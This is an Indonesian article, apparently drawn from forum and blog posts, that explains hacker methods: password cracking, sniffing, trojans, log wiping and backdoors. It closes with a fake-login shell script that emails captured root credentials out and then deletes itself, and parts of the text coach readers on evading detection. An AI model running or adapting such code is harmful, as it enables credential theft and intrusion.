Prinsip dasar program pemecah password dengan cara ini cukup sederhana. Basanya hacker yang ingin menggunakan program tersebut terlebih dulu menyusun daftar kata yang sering digunakan orang. Bisa berupa nama aktor, nama tempat, dan sebagainya. Lalu, program pemecah password tersebut akan mencobakombinasi yang sesuai. Ada juga program yang mencoba seluruh kombinasi kharakter yang mungkin , baik huruf, angka, maupun kharakter lain. Metode ini biasa disebut “brute forcing”. Beberapa program lebih baik misalnya Lophtkrack dan Unsecure, memiliki fasilitas untuk melakukan brute forcing maupun penebakan berdasarkan daftar kata.

Sampai sekarang, cara penebakan password masih banyak dipakai, dan program-programnya banyak, tersedia, baik untuk NT, UNIX maupun DOS. Misalnya saja krackerJack dan Starkrack. Program-program ini sebenarnya diciptakan untuk keperluan pengamanan sistem. Seorang administrator sistem biasanya memiliki beberapa program semacam ini, lengkap dengan seperangkat file daftar kata untuk memastikan bahwa password-password dalam sistemnya benar-benar kuat dan tidak mudah dibobol.

Pada awalnya, penggunaan metode penebakan password memiliki ekses yang cukup jelek, yakni sejumlah kegagalan login yang tinggi (akibat berbagai kombinasi yang salah) sebelum kombinasi yang sesuai ditemukan. Ini terutama terjadi pada penerapan brute forcing. Jumlah login yang gagal selalu dicatat dalam log system, dan log ini hampir pasti diperiksa administrator secara rutin. Sebagai akibatnya, administrator tahu bahwa upaya pembobolan tengah berlangsung. Oleh karena itu, para hacker sekarang berusaha menggunakan teknik-teknik tertentu untuk menyalin file daftar password dari sistem sasaran ke komputer mereka sendiri, lalu mencoba memecahkan dengan program penebak password saat offline. Dengan demikian, kemungkinan terdeteksi jauh lebih kecil.

Menyadap password dapat dilakukan dengan berbagai cara. Cara yang umum sekarang adalah dengan menyadap dan memeriksa paket-paket data yang lalu-lalang dalam suatu jaringan (lazim disebut sniffing atau packet monitoring ). Sniffing atau pengendus biasanya dilakukan etrhadap paket-paket data yang dikirim dalam bentuk teks biasa atau tidak dienskripsi.

Praktek sniffing yang lebih maju dibantu oleh sebuah protokol analizer, yang untuk membaca paket data yang dibungkus protokol etrtentu. Pemeriksaan paket-paket data dalam suatu jaringan sebenarnya adalah juga praktek yang bermanfaat bagi kalangan administrator sistem, untuk mengawasi gejala-gejala awal penyusupan. Namun cara ini juga umum dikalangan hacker maupun penjahat komputer.

Sebuah program pemantau paket dapat ditugaskan untuk mencari paket-paket yang berisikan kata-kata kunci semacam “password”, “login” dan sebagainya, lalu menyalin paket tersebut untuk dianalisis hacker yang bersangkutan. Contoh program sniffer antara lain Netmon, Etherpeek, LanWatch, tcpdump. Kesalahan pada program juga dapat dieksploitasi oleh para calon penyusup.

3.SNIFFING, CACHE POISONING & KEY LOGGER.

Jika anda termasuk salah seorang hacker sejati yang berada dalam sistem, kemungkinan besar anda akan berkeliling, melihat-lihat isi dari sistem yang baru saja dimasuki, dan mencoba berbagai perintah untuk mengetahui fungsinya. Salah satu contoh perintah yang sering digunakan adalah perintah ls (dalam UNIX). Perintah ini pada dasarnya hampir sama dengan perintah DIR dari DOS, yang berguna untuk melihat isi direktori.
Cara penggunaan script input (sniffing) yang bertujuanh mengeksploitasi kelemahan sistem juga sering digunakan. Metode sniffing dalam jaringan bisa dikombinasikan dengan cache poisoning. Cache poisoning dilakukan dengan cara “meracuni” tabel daftar alamat sebuah router atau perangkat sejenisnya, guna mengirimkan data ke jalur yang salah ( misalnya melalui komputer hacker). Ini utamanya yang terjadi pada sistem-sistem versi awal yang tidak melakukan otentikasi client/server.

Program lain yang mirip sniffer adalah key logger. Key logger sebenarnya lebih umum digunakan dalam pembobolan sistem komputer oleh orang dalam atau karyawan suatu perusahaan. Bila diaktifkan , program key logger akan bersifat residen di RMA komputer tempat tinggalnya. Program kemudian dapat mencatat setiap tombol yang ditekan oleh pemakai komputer tersebut, misalnya saat memasukan password.

4.MEMBONGKAR SANDI.
 Selain itu, seorang hacker dapat mencari password dengan mengotak-atik file yang kira-kira berhubungan. Misalnya saja pada sistem UNIX, file yang sering diperiksa adalah /etc/passwd, yang berisi daftar password.
Sejauh ini, belum ditemukan cara untuk menterjemahkan bagian password dalam file UNIX ke bentuk asli, karena disandikan secara satu arah yaitu dengan DES ( Data Encryption Standard) atau dengan triple DES. Pada saat seorang pemakai melakukan login , UNIX memeriksa benar tidaknya password yang dimasukan dengan cara menyandikan password tersebut, lalu membandingkan dengan password yang terenskripsi dalam file. Program pemecah password yang ada sekarang bekerja dengan menyandikan setiap kata dalam daftar kata, lalu membandingkannya dengan bagian password dalam file UNIX.

Untuk peningkatan keamanan, sebagian sistem UNIX menggunakan password shadowing. Password shadowing adalah mengganti kolom password dengan karakter khusus sementara password yang terenskripsi diletakan ditempat lain. Contoh penggunaannya irw:*14:4:Irwan:/home/irw:/bin/csh.

Dalam sistem yang menggunakan password shadowing, hacker akan mencari file password asli di direktori lain misalnya /etc/shadow. Direktori ini bisa berbeda-beda tergantung pada sistem operasi yang digunakan.

Sebenarnya bila file password berhasil didapat, seorang hacker tidak perlu terlalu repot berputar-putar mencari akses lagi. Ia dapat dengan mudah menyimpanya dikomputernya sendiri, lalu meng-kracknya dilain waktu. Dengan cara ini cepat atau lambat , hacker tersebut pasti akan mendapatkan seluruh password pemakai, termasuk password administrator sistem, si sistem tersebut.

5.TROJAN HORSE, DECOY & SHOULDER SURFING.

Cara lain untuk mencari hak akses yang lebih tinggi adalah dengan menggunakan trojan horse, atau biasa disebut trojan. Trojan sesuai legenda tentang kuda troya, adalah sesuatu program yagn ebrguna, tetapi telah disusupi kode atau perintah untuk menjalankan proses yang ilegal.
Sebuah kode untuk menghapus file-file tertentu tanpa sepengetahuan maupun seijin pemakai untuk login atau masuk ke suatu jaringan dapat ditambahi kode guna merekam nama pemakai dan password yang masuk, kemudian mengirimkannya ke komputer tertentu. Contoh koda troya elektornik adalah picture.exe, apabila dijalankan program akan mengirimkan data-data komputer kita ke suatu alamat email, misalnya ke Cina. Contoh yang lebih populer lagi adalah Netbus dan Back Orrifice-nya Cult of The Dead Cow.

Bentuk yang lebih kuno dari tojan adalah decoy. Decoy adalah program yang dibuat menyerupai tampilan login, tetapi sebenarnya berdiri sendiri. Decoy menipu pemakai untuk memasukan nama dan passwordnya ke dalam layar login tersebut. Setelah pemakai memasukan nama dan passwordnya, decoy akan menyimpan kombinasi tersebut ke dalam sebuah file, menampilkan pesan kesalahan yang memaksa pemakai merestart komputernya, atau pemakai mengulang login. Dan kala pemakai mengulang login, decoy akan mengembalikan ke sesi login yang sebenarnya.

Sebenarnya ada cara yang lebih sederhana, yang kadang-kadang disebut shoulder surfing. Secara praktisnya, shoulder surfing ini berarti diam-diam memperhatikan apa yang diketikan orang lain di komputernya. Tidak perlu teknik tinggi, apalagi kalau dicoba pada orang yang mahir mengetaik 10 jari. Aslinya cara in digunakan untuk mencuri kode telepon oleh para phreaker generasi awal di Amerika Serikat.
6.MENGHILANGKAN JEJAK.

Dalam penjelajahannya, seorang hcker yang ahli kan selalu berusaha agar aksinya tidak diketahui orang. Ini untuk menghindari resiko dipenjarakan jika ia tertangkap tangan. Sebab saat ini hampir semua orang menganggap hacker sebagai teroris informasi, dan bahkan sebagai penjahat komputer.
Seorang hacker memperkecil kemungkinan terdeteksi oleh orang lain dengan melakukan aktifitasnya disaat sistem yang akan dimasukinya tidak atau kurang diawasi. Berkaitan dengan teknik, salah satu cara yang paling umum adalah menyunting file-file log pada system yang dimasuki dan menghilangkan semua entry yang berkaitan dengan dirinya. Aktivitas yang berlangsung selama hacking, misalnya aktivitas scanning, bisa disamarkan dengan memasang kuda troya / trojan ke program-program yang digunakan utuk mengawasi jaringan (misalnya netstat). Untuk menyembunyikan identitas saat melakukan finger, dapat digunakan semacam Finger@host1@host2. Ini adalah cara untuk memperoleh informasi finger tentang host2, tetapi perintahnya dialihkan sehingga seolah-olah datang dari host1.

Cara lain untuk menyamarkan identitas saat beraksi adalah melakukan bouncing. Bouncing adalah memanfaatkan sesuatu sistem sebagai basis operasi untuk memasuki sistem lain. Dalam praktek bouncing, jejak-jejak akan mengarah ke komputer yang dijadikan basis operasi dan bukan ke lokasi hacker sebenarnya. Bouncing dapat dilakukan melalui FTP, mesin proxy server, Wingate atau host lain (dengan memanfaatkan Telnet atau rsh). Selain melalui internet, bouncing juga bisa dilakukan melalui manipulasi hubungan dengan telepon. Bouncing semacam ini sukar sekali dilacak, tetapi tingkat kesulitannya juga tinggi.

Bagi seorang hacker, selain menyulitkan pelacakan , bouncing juga berguna untuk melewati berbagai program proteksi. Umpamanya komputer A yang berfungsi sebagai Web Server dan komputer yang fungsinya sebagai FTP server berada dalam suatu jaringan / subnet yang terhubung ke internet. Komputer A diproteksi terhadap akses dari internet oleh sebuah firewall. Hacker yang ingin masuk ke komputer A dapat memerintahkan komputer B yang terbuka untuk melakukan koneksi ke port tertentu dari komputer A. koneksi ini kemudian bisa dimanfaatkan oleh hacker. Karena komputer B dan A ada di subnet yang sama, lalu lintas data yang terjadi tidak akan disaring oleh program firewall yang hanya menyaring paket dari luar subnet.

7.MEMBUAT BACKDOOR.
Selain cara menghilangkan jejak, para hacker juga tentu memikirkan cara untuk kembali ke sistem tersebut. Jika setiap kali ingin masuk harus mengulang semua proses diatas, ia akan kesulitan. Oleh karena itu hcker menggunakan apa yang disebut backdoor atau pintu belakang.
Backdoor pada dasarnya adalah jalan tembus yang dibuat oleh hacker setelah masuk, yang berguna untuk kembali tanpa perlu melalui sistem proteksi lagi. Contoh pemasangan backdor adalah modifikasi file hosts.equiv dan .rhost pada sistem UNIX. Modifikasi pada file-file tersebut memungkinkan komputer host hacker diberi status trusted oleh sistem sasaran, sehungga pengaksesan dari komputer hacker tidak disaring. Backdoor juga bisa dibuat dengan menambahkan account-account baru pada file daftar password (/etc/passwd pada UNIX standar). Alternatif dari penambahan account ini adalah pembuatan daftar password palsu, yang kemudian akan ditukar tempatnya dengan file password asli pada waktu-waktu tertentu.

Selain itu cara yang paling umum adalah dengan mengubah konfigurasi servis. Konfigurasi tidak begitu sering diperiksa (berbeda dengan daftar password dan log), sehingga kemungkinan terdeteksinya lebih kecil. File-file yang dimodifiasi misalnya /etc/inetd. Memodifikasi ini biasanya dilakukan dengan mengganti daemon dari servis yang jarang digunakan dengan suatu proses yang memberikan shell bagi hacker (etrutama akses root). Seorang hacker bukannya tidak memiliki kode etik. Justru kode etik ini sangat penting untuk membedakan seorang hacker dengan penjahat komputer yang dikejar-kejar penegak hukum. Yang juga harus dimiliki oleh seorang hacker adalah pengetahuan tentang teknik pemrograman (biasanya dalam bahasa C atau perl). Dalam membangun suatu program dalam sistem yang akan dimasuki, para hacker biasanya memerlukan perangkat keras berupa kmputer, modem dan saluran telepon. Mereka juga harus sudah terhubung ke sebuah jaringan khususnya internet. Hacker sejati tidak perlu alat yang aneh-aneh, umpamanya interface komputer otak, seperti komik Ghost in The Shell.
Quote:

8.PERANGKAT LUNAK YANG DIBUTUHKAN HACKER.

Kebutuhan utama para hacker adalah jenis sistem operasi yang digunakan. Umumnya hacker sejati menggunakan sistem operasi UNIX atau variannya, seperti RedHat, FreeBSD, SlackWare, OpenBSD dll. Kendati banyak juga program hacker yang ditulis untuk Windows dan DOS, biasanya hacker yang benar-benar serius menggunakan sistem operasi UNIX, Linux atau OpenBSD. Sistem UNIX sangat baik dan memang seja kemunculannya dirancang khusus untuk jaringan.
Jika sistem ini tidak ada, para hacker dapat menggantinya dengan berlanggnan yang disebut dengan shell account. Shell acount pada suatu ISP akan memberi pemakai sebuah shell di sistem UNIX ISP tersebut. Apa sebenarnya shell? Shell adalah perantara pemakai dan sistem operasi UNIX yang ebrfungsi sebagai penetrjemah perintah. Jenis program shell bermacam-macam, seperti Bourne Shell (sh-shell yang pertama ada) Bourne Again Shell (Bash), Korn Shell (ksh) dan C-Shell. Format perintah C-Shell mirip bahasa C, dan disebut-sebut sebagai shell ideal untuk pemrograman. Pemilikan shell acount memungkinkan pemakai login dan memberi perintah pada komputer UNIX penyedia shell account, seolah-olah komputer UNIX tersebut adalah milik pemakai (file-file pamakai yang diperoleh selama mengadakan shellaccount pun akan bertempat disana, bukan di harddisk pemakai). Ini memang dalam batas-batas tertentu bisa menutupi ketidakadaan UNIX pada komputer si pemakai.

Tetapi, pemakaian shell account memiliki beberapa kerugian. Antara lain, tidak semua ISP menyediakan shell account. Alasannya sangat sederhana, yaitu alasan keamanan, karena biasanya hanya hacker dan penjahat komputer yang perlu shell account. ISP yang menyediakan shell account kemungkinan dimiliki seorang hacker juga, yang boleh dibilang sudah maklum.

Sebenarnya bisa saja seseorang berlangganan shell account di ISP selain ISPnya, tetapi keamanan nya kurang terjamin (pengiriman passweord bisa disadap, kecuali menggunakan SSH-Secure shell), lagipula ini perlu biaya tambahan. Meskipun begitu ada juga keuntungannya, yaitu lokasi asli dari pemakai tidak akan diketahui. Salah satu metode alternatif dari berlangganan di luar negeri adalah membajak account dari sistem-sistem yang proteksinya lemah.


http://m.kaskus.co.id/thread/52ca757559cb17d8688b470d/cara-hacker-beraksi


 





Contoh kasus Trojan House, memanfaatkan SHELL script UNIX :

Seorang gadis cantik dan genit peserta kuliah UNIX di sebuah perguruan tinggi memiliki potensi memancing pengelola sistem komputer (administrator pemegang account root . . . hmmm) yang lengah. Ia melaporkan bahwa komputer tempat ia melakukan tugas-tugas UNIX yang diberikan tidak dapat dipergunakan. Sang pengelola sistem komputer tentu saja dengan gagah perkasa ingin menunjukkan kekuasaan sebagai administrator UNIX.

“Well, ini soal kecil. Mungkin password kamu ke blokir, biar saya perbaiki dari tempat kamu”, ujar administrator UNIX sombong sambil duduk disebelah gadis cantik dan genit peserta kuliah tersebut.

Keesokan harinya, terjadilah kekacauan di sistem UNIX karena diduga terjadi penyusupan oleh hacker termasuk juga hompepage perguruan tinggi tersebut di-obok-obok, maklum pengelolanya masih sama. Selanjutnya pihak perguruan tinggi mengeluarkan press release bahwa homepage mereka dijebol oleh hacker dari Luar Negeri .

Nah sebenarnya apa sih yang terjadi ?

Sederhana, gadis cantik dan genit peserta kuliah UNIX tersebut menggunakan program kecil my_login dalam bentuk shell script yang menyerupai layar login dan password sistem UNIX sebagai berikut:

#!/bin/sh

###################################

# Nama program : my_login

# Deskripsi :Program kuda trojan sederhana

# versi 1.0 Nopember 1999

####################################

COUNTER=0

Cat /etc/issue

While [ "$COUNTER" –ne 2 ]

do

let COUNTER=$COIUNTER+1

echo “login: \c”

read LOGIN

stty echo

echo “password: \c”

read PASSWORD

echo “User $LOGIN : $PASSWORD” | mail gadis@company.com

stty echo

echo

echo “Login Incorrect”

done

rm $0

kill –9 $PPID

Apabila program ini dijalankan maka akan ditampilkan layar login seperti layaknya awal penggunaan komputer pdaa sistem UNIX:

Login:

Password:

Lihatlah, Administrator UNIX yang gagah perkasa tadi yang tidak melihat gadis tersebut menjalankan program ini tentunya tidak sadar bahwa ini merupakan layar tipuan. Layar login ini tidak terlihat beda dibanding layar login sesungguhnya.

Seperti pada program login sesungguhnya, sistem komputer akan meminta pemakai untuk login ke dalam sistem. Setelah diisi password dan di enter,maka segera timbul pesan

Login:root

Password: ********

Login Incorrect

Tentu saja Administrator UNIX akan kaget bahwa passwordnya ternyata (seolah-olah) salah. Untuk itu ia segera mengulangi login dan password. Setelah dua kali ia mencoba login dan tidak berhasil, maka loginnya dibatalkan dan kembali keluar UNIX.

Perhatikan program di atas baik-baik, sekali pemakai tersebut mencoba login dan mengisi password pada layar di atas, setelah itu maka otomatis data login dan password tersebut akan di email ke mailto:hacker@company.com. Sampai disini maka si gadis lugu dan genit telah mendapatkan login dan password . . . ia ternyata seorang hacker !!

Walaupun sederhana, jika kita perhatikan lebih jauh lagi, maka program ini juga memiliki beberapa trik hacker lainnya, yaitu proses penghilangan jejak (masih ingat tahapan hacker yang ditulis di atas ?). Proses ini dilakukan pada 2 baris terakhir dari program my_login di atas, yaitu

rm $0

kill –9 $PPID

yang artinya akan segera dilakukan proses penghapusan program my_login dan hapus pula ID dari proses. Dengan demikian hilanglah program tersebut yang tentunya juga menhilangkan barang bukti. Ditambah lagi penghapusan terhadap jejak proses di dalam sistem UNIX. Zap . . . hilang sudah tanda-tanda bahwa hacker nya ternyata seorang gadis peserta kuliahnya.

Sukses dari program ini sebenarnya sangat tergantung dari bagaimana agar aplikasi ini dapat dieksekusi oleh root. Hacker yang baik memang harus berusaha memancing agar pemilik root menjalankan program ini.

http://artikel4us.wordpress.com/page/9/

http://irmayuuki.blogspot.com/2012/12/kejahatan-dewasa-ini-informasi-tentang.html